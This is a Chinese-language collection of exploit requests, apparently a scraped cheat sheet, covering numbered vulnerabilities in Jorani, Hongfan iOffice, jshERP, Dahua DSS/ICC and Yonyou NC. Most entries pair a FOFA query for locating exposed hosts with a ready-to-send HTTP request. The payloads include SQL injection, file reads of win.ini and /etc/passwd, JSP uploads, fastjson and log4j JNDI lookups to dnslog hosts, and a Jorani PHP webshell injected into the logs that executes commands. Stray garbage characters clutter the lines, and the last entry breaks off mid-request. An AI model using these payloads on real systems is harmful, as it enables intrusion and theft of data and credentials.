2 g0 B Y! x8 V# A# T- ?GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
* \( H8 R+ Q2 P- n' \Host: 127.0.0.1* A% a: O. B. \7 _: F0 b
Pragma: no-cache
7 Q& g* ]: K6 O5 f2 a- G/ VCache-Control: no-cache: T3 `1 l' r1 b6 ~" N
Upgrade-Insecure-Requests: 16 g6 c9 W6 U! Y2 f" N; n8 F' X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
- c+ y. N+ L" yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 E1 K) }& [1 K0 T( X( W
Accept-Encoding: gzip, deflate
& Y7 d- E5 o! J' C2 Y) XAccept-Language: zh-CN,zh;q=0.9,en;q=0.8& I0 R% d' p/ B( o y
Connection: close
( B+ n* g Z6 O( B& ^" P
* k5 N% r2 {5 O% W& [: S! c1 M8 f/ m& `) W7 h7 O
12. Jorani < 1.0.2 远程命令执行
& j* _! M1 r [0 a" ZFOFA:title="Jorani"
2 f, ^) B3 F- N# L* ]! }) f第一步先拿到cookie
8 R$ x/ S) D& n6 P8 B9 zGET /session/login HTTP/1.1
/ m/ k2 U- I! m% ~Host: 192.168.190.309 t; k! ~% }4 R3 l
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
0 t8 y% l; ?5 ~5 \* X) @! s, q% RConnection: close
# W7 W& k% [' e: Z: p3 t$ G" HAccept-Encoding: gzip, k2 i/ o3 u2 j' k3 z5 R4 }; X
! L4 n" S/ c0 p/ ?* r! D+ W4 F0 T2 P' b1 {+ R) s1 d
响应中csrf_cookie_jorani用于后续请求
0 p/ K8 Z/ n$ X$ {HTTP/1.1 200 OK& o& |/ m; X+ x( E/ j
Connection: close
8 q. L3 Y# |% ~. {6 g, R5 rCache-Control: no-store, no-cache, must-revalidate
' l1 C, e6 Z' S! ?& B; h$ @" \Content-Type: text/html; charset=UTF-84 O4 A/ ?. K4 u6 G3 b
Date: Tue, 24 Oct 2023 09:34:28 GMT2 e* Y3 _# V$ c- c, }
Expires: Thu, 19 Nov 1981 08:52:00 GMT
6 W5 e( c5 L: }5 w1 Y% ]; GLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT( N1 ]2 K* a$ L1 d
Pragma: no-cache
1 A$ b0 u, H |& X9 N6 } i6 KServer: Apache/2.4.54 (Debian)6 |3 H# O6 p" J, G
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/4 L: _5 C/ H }
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly9 i6 c5 h6 \! B/ [# H& ^
Vary: Accept-Encoding7 N- G+ Y w4 o% r! e* I6 [
5 M" i0 c5 I$ G5 z1 Y1 N# Q. ~5 P- j' I4 A" ^+ J& [
POST请求,执行函数并进行base64编码2 _& w' ^! w/ S8 r+ Z
POST /session/login HTTP/1.1* m$ ?) e8 I5 K1 G6 H& o
Host: 192.168.190.30, \9 h( T0 o- S7 a% V7 }1 i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
' {& c6 A) N- w oConnection: close3 S' ]5 Q1 Z* C+ N$ f
Content-Length: 252
3 F1 E; E* `: a* r8 b# ?3 iContent-Type: application/x-www-form-urlencoded6 E9 r9 d# h$ Q
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r) O' t$ V* ~! L4 Q: x# n* v( r0 e
Accept-Encoding: gzip m9 r. k$ ^/ G0 w; ?
F& ~+ N1 Y2 g* `5 F( tcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
! m. k1 H% \0 S% t
- Y6 [; o* x6 m% r ~# ^# X* l6 s
( u! e$ t% j! ]; g6 p% W# E5 Y ]$ ]8 L/ G
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串3 _- _# t; m% [8 H( \% v( z% k
GET /pages/view/log-2023-10-24 HTTP/1.1
' ^; _8 t7 q- }Host: 192.168.190.302 f# x) X6 O9 z- o% c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
/ G7 |" T! p* ~ k1 e1 f7 ]9 JConnection: close
; B9 \5 l1 i3 k6 I% [7 d# qCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r6 `1 O& ?% v0 I1 l: R' Z& Z9 S
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=, c0 V. `' K- F: X1 d1 v. K I
X-REQUESTED-WITH: XMLHttpRequest
' V$ j p2 ~0 n& ^Accept-Encoding: gzip
* W" I, e$ x- t% W2 ]( F2 B3 S, M, F, Q1 B4 A% r$ V
( _+ N! o0 g! m: z% `: n: w# s
13. 红帆iOffice ioFileDown任意文件读取
" p# v7 U( C/ n( e5 D" k! x4 t9 |9 XFOFA:app="红帆-ioffice"* Q! S) A& l& C# E( O6 E
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1/ d/ ?2 i* R" k3 N+ t9 t$ T
Host: x.x.x.x
G! k! s+ g* n& ` J7 gUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
+ J3 |# Z2 n7 ?' |Connection: close
; ~# a) Y( a% N( xAccept: */*
$ D' E; C* Q9 f1 g4 L7 [$ ~Accept-Encoding: gzip
! _ g% S0 ~( i% E
! F- d2 P2 F- \% j; q" T- ^/ E" {- Z& h
14. 华夏ERP(jshERP)敏感信息泄露4 C3 q" |' p1 G
FOFA:body="jshERP-boot"3 T# M5 d$ R3 r
泄露内容包括用户名密码
& [, `% E' X( s6 Y4 {. f& m( SGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
/ k4 z& L* I: A1 q- ]) f6 aHost: x.x.x.x- T8 t4 c" r1 k8 Z$ V+ t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.361 u0 h8 m( j( x. X
Connection: close2 @- ^% m) O2 M3 G
Accept: */* ~+ d, C% s- D3 \0 K
Accept-Language: en, K3 s- S- F8 x! {' Y! f
Accept-Encoding: gzip
1 y, w7 r: }, B) I: L
1 g' ~) B" m! B2 } h4 ?5 z R; w3 k
15. 华夏ERP getAllList信息泄露6 m9 O) w" V& E
CVE-2024-0490/ Y) W3 H7 T1 n5 ^' `' c* ]8 A
FOFA:body="jshERP-boot"
) H8 X$ [# f, M( s6 Q% o+ O1 K泄露内容包括用户名密码
) u- O9 O& o: \; c% BGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1+ W( l8 Q5 E: S
Host: 192.168.40.130:100, [% j' Z# [- R1 T n! j3 Y/ {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36, ?% O% X! B$ s- l
Connection: close
* G. c. \5 T& n! F! I+ U9 X5 d8 VAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
" s% b/ u9 J% v: }Accept-Language: en
; K- F* i$ M! ~sec-ch-ua-platform: Windows( O+ W5 K7 ~+ _+ V3 Z) @* P7 i( S
Accept-Encoding: gzip
4 M7 Q3 I1 p& h# h7 K2 H; v. C. o; n, K2 e
: y. Y& D+ ^; J: @5 d) t# V. y, n
16. 红帆HFOffice医微云SQL注入' \- }3 Y, `8 p
FOFA:title="HFOffice"
) l( w1 v q |1 Opoc中调用函数计算1234的md5值
# X9 W% `/ `. W7 p# D+ o& z/ B# o* JGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
+ z2 `8 l! Q2 ]# v3 U: @Host: x.x.x.x% L/ u3 ~) N: U4 @
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.362 y+ p2 T8 ^/ y9 y$ A$ P
Connection: close i; S V# H1 l) J; y5 W
Accept: */*! q }6 Q. ~) e% n1 C5 u/ M
Accept-Language: en
* k( j0 A4 N6 {* h; TAccept-Encoding: gzip
! c0 Q( N+ H, E$ A. t7 n! _2 u: m3 @! ~1 R6 @$ ^
( E, z7 T; |0 |3 \" R0 C17. 大华 DSS itcBulletin SQL 注入
$ g( j5 \! D1 AFOFA:app="dahua-DSS"
M. f6 B1 g- f; g# |9 KPOST /portal/services/itcBulletin?wsdl HTTP/1.1
7 |3 ~! R9 X/ S' s4 I3 g* r8 MHost: x.x.x.x. l* m8 x6 F' j7 s$ W$ v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 ]: V' `4 |7 [1 S; K. i! f
Connection: close5 Z% t+ h5 J7 m$ H
Content-Length: 345# I% u* G0 M) P% C2 E
Accept-Encoding: gzip) i! v" D& [& Z1 n0 D
+ z6 f* m) i( f6 s5 l<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
% M" h6 J) u( N2 E* e9 G<s11:Body>
' A( G- I/ C1 ?( j$ R6 ?0 L6 ] <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
0 i [- {+ I( ^/ N$ ] <netMarkings>
, b$ s+ T& c3 O# i6 A0 ~ (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
: v1 I. a0 W' X </netMarkings>
! c5 |# \% }4 n: d </ns1:deleteBulletin>
8 ^% j; B) {. r7 P- k( W </s11:Body>
5 G" W0 {1 f. p' r/ |7 D% p" c</s11:Envelope>
# v; B" N: J1 `- l7 h
8 L- j& D4 g k% g8 m) w: F; M/ L7 T
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露( B) P5 Y5 O+ W) }
FOFA:app="dahua-DSS"
6 K' r$ p# m9 K# S" U6 sGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
! K: ?0 o, V/ ?: B" c8 YHost: your-ip
t1 B; L9 o+ p4 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. }9 U2 I6 H3 e# a' O/ y( Z$ k( ^Accept-Encoding: gzip, deflate
3 b( T( q, E* m+ D3 VAccept: */*
, [$ j2 S$ i: EConnection: keep-alive
0 x$ @9 y" T5 P1 z6 ~" [& Z! A! W) s/ U# k
2 N$ Z4 F! w. d
4 [+ u- ?$ R1 I1 z) C/ r' M19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
* O- H+ }& t w7 e" {FOFA:app="dahua-DSS"
3 q6 e5 }" D, l# _GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.15 W9 s" N& T' b
Host:& E( A0 L5 j5 M- L6 y1 G& l: Q
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
) m. [0 l4 j' |+ X* LAccept-Encoding: gzip, deflate
' F' Z2 c6 ~2 D: b5 DAccept: */*
1 e% q' p u0 N* F3 sConnection: keep-alive1 G6 g' m8 H( F' Z; j8 p; j
4 x- h% B+ u! F: U& C! }. y, E/ O2 u
20. 大华ICC智能物联综合管理平台任意文件读取0 o0 t& W/ f+ T# v, z
FOFA:body="*客户端会小于800*"- K* Q p5 e( z8 a$ w( o+ D
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
( G: N" l" I& QHost: x.x.x.x' R* z3 ]* X" Q! ~
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. T5 N, W3 ~7 e( I! w# BConnection: close
y8 q* i, T' F) B: J2 ZAccept: */*
7 [8 g6 t8 x. N% P+ PAccept-Language: en
: E4 Q u8 m8 t5 M, K# DAccept-Encoding: gzip6 t& A! }! J5 P- F ~
& |: U/ C$ X: s8 F
; ^2 m* P) _% o7 L8 F/ l1 ~21. 大华ICC智能物联综合管理平台random远程代码执行
8 f. i }( s x9 v- bFOFA:icon_hash="-1935899595"6 H1 ~! K; I- P5 _5 H, N
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.11 Q# D& g7 n e4 c& b& t
Host: x.x.x.x/ F4 f, j( M/ V/ t7 }! V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 c8 m# T/ C: r! Y5 @# k
Content-Length: 161& X& Y: a9 P, V7 P: \+ ~& P. Z
Accept-Encoding: gzip
! U: J5 |( |6 D0 ?/ |Connection: close
- W* P2 O# s( Q* h! `/ Y% F! ~5 |Content-Type: application/json;charset=utf-81 p& `. F7 q+ W" {$ A; A c; n
* T2 D5 N9 ^) E( \' A; y- Z# C{
4 n# Z" B b. Z"a":{
/ w5 _5 ]% ~) {' v1 g "@type":"com.alibaba.fastjson.JSONObject",% S0 ]4 S; x. W$ t0 u- X9 O
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
O0 t; G# M; ^2 P, B }""+ {$ W4 |% j5 X& [) m$ W
}2 {7 g5 }; o# h, I
- [" \- O; S- C( ]4 m
0 q5 a$ _0 \0 y+ j+ `7 c4 A22. 大华ICC智能物联综合管理平台 log4j远程代码执行
+ }; `9 c8 J# W+ x: N( E& N8 `FOFA:icon_hash="-1935899595") J5 B) G- I; X: |6 L' c
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1$ y+ |# K* d7 Y5 p# V1 W! U9 |
Host: your-ip
. `& B& o0 w2 H, j& k- ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
: z+ T3 S, K4 p0 KContent-Type: application/json;charset=utf-87 H6 A. a" Q" P t# A* Y
6 X- F ^8 E: ~5 b) F6 T- d
{
: v: r6 }; W5 O" R7 E4 g0 `2 _"loginName":"${jndi:ldap://dnslog}"
! e- O9 D" O) x4 h, s& p}
4 Y1 x* \( V D% L/ s5 T$ r2 d8 P( N( a# V) P) Z( y. a
$ T @" K- C! l- r" H c
' v. \9 V6 `0 k! Q23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
* ]* M0 x) x2 |1 q `- NFOFA:icon_hash="-1935899595"" o$ V- {6 U B% j
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
( [9 `/ i& Q4 B7 kHost: your-ip
% V1 u6 b* }+ L# A7 E* }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# R* _5 _1 U% q+ M+ B7 YContent-Type: application/json;charset=utf-8: u6 F s S. @1 {: i) Y
Accept-Encoding: gzip
. }! @( _8 ]9 _" n2 \9 }9 e3 wConnection: close2 H7 {! S4 H) t3 C# c* j
5 m3 H2 m8 C4 O3 j/ F
{
L. p+ C1 ]% m "a":{, l) h; Q3 e' G1 W+ I( D
"@type":"com.alibaba.fastjson.JSONObject",' ~2 w' ?, Q, Y* f. M
{"@type":"java.net.URL","val":"http://DNSLOG"}2 M2 W6 k$ r& n" J! W
}""
% ]; Y9 Z& Z; a- { I- t}0 X' Q2 L; m3 }6 u4 L" z
! A4 v" o! d/ X( }& @
9 R) h& \+ g2 x: b- F24. 用友NC 6.5 accept.jsp任意文件上传( L& f" P L6 {9 C) @, i: S
FOFA:icon_hash="1085941792"
* R, b. Q- r: V' V2 X# I6 s, WPOST /aim/equipmap/accept.jsp HTTP/1.1
- B' U8 g' Y7 S( X5 x2 V- @5 U2 @Host: x.x.x.x% K: Y& D$ L0 P# a5 F' l
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
3 V& f; G8 O9 t; F, v+ H) i5 ^Connection: close
9 C) S. S- y7 S3 G8 T+ _2 |4 ^& bContent-Length: 449/ L4 K, X. s: a3 g
Accept: */*; T0 e7 n5 d+ S; L9 N: [6 y
Accept-Encoding: gzip
! H @. ^7 T8 [- {Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
. {* {; b% h8 c& ^) ~) r' M8 P1 W% Q) E: L" t9 i) ?
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
% g! x9 R6 V, _) I2 u |Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
! ^/ J* r+ n6 [/ W3 w% n( h/ qContent-Type: text/plain
# r2 u- \( ?. h9 l& \- X! t! e
- x' ~# ]3 K' b& j; L<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
2 g7 \8 `! e0 _: e-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc' }( R& T m0 H3 c% o9 b
Content-Disposition: form-data; name="fname"
+ i0 u0 ~) ]' f7 h. `# Y5 B$ [1 ?1 ?: r/ S2 R
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp" T' J. N4 U7 i( S3 }, K
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
! E l4 p% |# S7 i& ]3 |$ J1 Y2 _
7 @: z" P1 t [5 H( k) p
3 b% _8 O: ^" W7 Z25. 用友NC registerServlet JNDI 远程代码执行
- d4 u, T/ H7 t; YFOFA:app="用友-UFIDA-NC"# B3 m ]2 k* M% o( `: T; }
POST /portal/registerServlet HTTP/1.11 r% l2 x9 v6 M8 Y* B5 c( E! X
Host: your-ip/ _2 L' X3 v, T( g# |, R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
& z0 ^: q9 J. p. x* oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
% E R" a w4 Q5 V3 N( p2 w9 PAccept-Encoding: gzip, deflate
9 u8 _9 [: y3 s5 w. tAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.69 q$ O2 m8 N; J0 u `1 A8 m1 o
Content-Type: application/x-www-form-urlencoded9 |" N L' o: Q; u4 S
8 E6 m) Q, |2 u6 ~0 Z
type=1&dsname=ldap://dnslog
$ r' ^, @- p/ u0 y% K, s6 i/ q' o, r! x F( |
# ^7 A5 b6 p$ I. x) e" ~
t5 U$ d1 g ]8 Z2 E26. 用友NC linkVoucher SQL注入
4 {: t/ K% D5 OFOFA:app="用友-UFIDA-NC"
# D2 k- p2 C9 {2 }7 r- c( a/ T* r( a# gGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1+ ?) I+ t7 c% Q% u' A- U( b6 L- l
Host: your-ip7 f0 |: e f$ U0 c+ o( @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' }9 R# |. M H" T5 [Content-Type: application/x-www-form-urlencoded
; s, p0 Z3 Z; W! w0 \' s, Z5 AAccept-Encoding: gzip, deflate* P7 ^( R8 S7 w! |/ t
Accept: */*
/ P4 w Y, P; AConnection: keep-alive) ~+ A: [3 d3 \5 }2 G
" R7 R* I8 X2 N' q% |4 l
( v8 H/ u" h0 W; n6 Q) ]6 M( Q27. 用友 NC showcontent SQL注入$ E* D* Z2 P6 N3 w
FOFA:icon_hash="1085941792") u$ b5 C+ W3 x
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
$ g" K0 i) o" m5 FHost: your-ip8 k" b4 M* g4 M/ Y4 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 L5 d( B2 x) R) J0 M" R
Accept-Encoding: identity8 d$ g/ `& N/ @/ A0 s( S' u# C v+ U
Connection: close# {& i* y0 b( _ X
Content-Type: text/xml; charset=utf-8
& c; P7 S" R* V% s/ R) |% |
( b1 R1 x- o2 A9 `( G
: {7 e. S7 u$ R6 p1 r0 x; R28. 用友NC grouptemplet 任意文件上传: L8 o0 k" a& H' ]9 n
FOFA:icon_hash="1085941792"3 j. H- ]" T# L) ?! B6 W* x. m# i
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
3 p6 I S) n/ ~5 iHost: x.x.x.x
) f2 N4 P7 H+ r9 f% C, u" jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
6 `3 U8 T0 Q! a7 EConnection: close- f5 g* r7 Q, Q7 M9 J
Content-Length: 268" ?7 \3 y7 s/ f. T7 A) f1 ~
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
! j. W5 P9 Q6 q9 {3 d& U/ m' UAccept-Encoding: gzip" p/ w- [7 B, x. N1 a, d
. S+ H$ K6 V) _( [$ s' B
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk, o- ^5 C7 C# b" E* j1 R6 m
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"- z5 T) e- V( c$ M
Content-Type: application/octet-stream# ^1 N$ D5 q, L% S! h1 ^( l* l
4 F1 N: A2 p) P& j<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>! v. R. @. \9 H. k* Y4 P
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--4 M& R6 H; F5 f, j% m
" s) `/ O2 P9 ~: S B
; G1 A# O0 G0 @. k7 R/uapim/static/pages/nc/head.jsp
' }3 {. g* d) |) E
6 S: n$ |$ X3 n' _& L. j. \29. 用友NC down/bill SQL注入$ F5 s K( U. l2 x* ?! i
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"8 J4 S* R$ d6 m# t
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.10 J- s) v" z7 _) U$ F, e
Host: your-ip
' t+ `! P! F3 [) IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 q: q8 p7 c P2 Y1 M" KContent-Type: application/x-www-form-urlencoded
% s7 ]4 e5 E0 Y& o9 OAccept-Encoding: gzip, deflate
, ^5 p+ [# W' w8 H) H1 UAccept: */*
' p/ p* ?/ m* oConnection: keep-alive; z1 y) H' r% C5 l
1 w+ B9 b' z P" \/ X B2 I7 K
. }4 _8 D, w* d9 y% R30. 用友NC importPml SQL注入
+ d1 p! [ {: I* m- o& H" uFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"3 I% B% [/ G" z# B6 T; N
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1! D: l y4 e1 w) v, [
Host: your-ip9 e8 b. Y" H) C3 J" z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V8 R4 v0 ]2 W" X3 E; i2 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
7 S1 h! G6 I2 m0 }; m% @Connection: close
9 E2 r0 R F4 P# D6 d
) e5 {4 _: P8 F2 {& `2 Z# B, ?------WebKitFormBoundaryH970hbttBhoCyj9V7 b4 K, h/ J) ?$ _2 a* U
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"- o4 g7 d, ^* \, o/ c
Content-Type: image/jpeg0 I. s* u/ {$ |
------WebKitFormBoundaryH970hbttBhoCyj9V--
; q0 \3 i# H `* d5 s8 S
3 n! v, i( v; b: a1 u4 n! J) o' E7 z3 s8 C, U: [: I$ }
31. 用友NC runStateServlet SQL注入
2 L2 V. c! M. N6 m, Uversion<=6.56 j! @, C$ V' i3 {
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"# X8 D( J" a( m, A
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
3 E' O+ C' d+ e F: fHost: host
D) O8 d2 U1 w1 }% \( sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
7 b- o0 Y) A* {: {- n9 TContent-Type: application/x-www-form-urlencoded
0 t0 h2 k* ]" Q2 G
; W: Z# y& d& }2 @' Y, E7 L# l& h# O
32. 用友NC complainbilldetail SQL注入
2 ]5 |8 A& R) v6 L7 ^version= NC633、NC65
7 z# [, _9 y5 h* N6 _$ f6 m2 qFOFA:app="用友-UFIDA-NC"
+ r) P0 x X, b5 }5 Q1 EGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
* c. a$ s9 d, rHost: your-ip8 j8 J9 u: t0 o5 }/ w; {2 y- Y5 _- M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
`1 a" i* c! r: S8 u+ sContent-Type: application/x-www-form-urlencoded# B0 i x( ]5 L
Accept-Encoding: gzip, deflate+ x1 S. ]& k( m$ r+ @. O
Accept: */*! T2 [: ]8 J I$ ]1 p
Connection: keep-alive
5 R- F1 P) v7 F* ]* u
. t$ v7 N5 @6 a
4 T# [4 w$ {4 ~% o9 m33. 用友NC downTax/download SQL注入
, F) m7 }, J8 R$ j' X1 P8 @/ xversion:NC6.5FOFA:app="用友-UFIDA-NC"
: R: Z- c* r2 f; I* q, B) ~GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
' w [/ j. q g4 m; k- P0 m* j4 A( eHost: your-ip
) m0 k. E$ H: |4 G4 a( |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" c" ~$ O% j% z" H- z3 @
Content-Type: application/x-www-form-urlencoded
1 Z. |) P) `. z3 t4 X2 EAccept-Encoding: gzip, deflate3 K2 V) j6 t. @) X2 G- @
Accept: */*
2 u! O. R7 w# N) }5 T6 L; zConnection: keep-alive* u7 ^* S9 v+ { l- ]
+ s9 t3 w( X: N# M* X9 {6 B) X" A0 }7 f
34. 用友NC warningDetailInfo接口SQL注入
- w$ M: R F2 }$ i. E5 jFOFA:app="用友-UFIDA-NC"- R' `6 W$ C8 L
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
4 m. o6 G% p1 m5 z& @) vHost: your-ip
' z2 N! S/ Q% x' \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. C5 N' w3 c8 `( S# m4 N
Content-Type: application/x-www-form-urlencoded
( f' v1 Y4 T2 i" Y! F2 AAccept-Encoding: gzip, deflate
4 n; e) p/ L- VAccept: */*
: C, G' L- ^# [1 Q- oConnection: keep-alive
* r- V5 }# |" M, l6 M# ]2 I# l2 E7 }8 u
7 A8 ~5 J* K2 K# B0 {9 {35. 用友NC-Cloud importhttpscer任意文件上传+ H( s+ y+ |, y* g$ ~
FOFA:app="用友-NC-Cloud"
) d$ k0 Q. I2 K3 z, V3 L3 f- IPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1; ~; v% @% b3 u o) j
Host: 203.25.218.166:88881 s! q9 I/ p& j( b0 Z
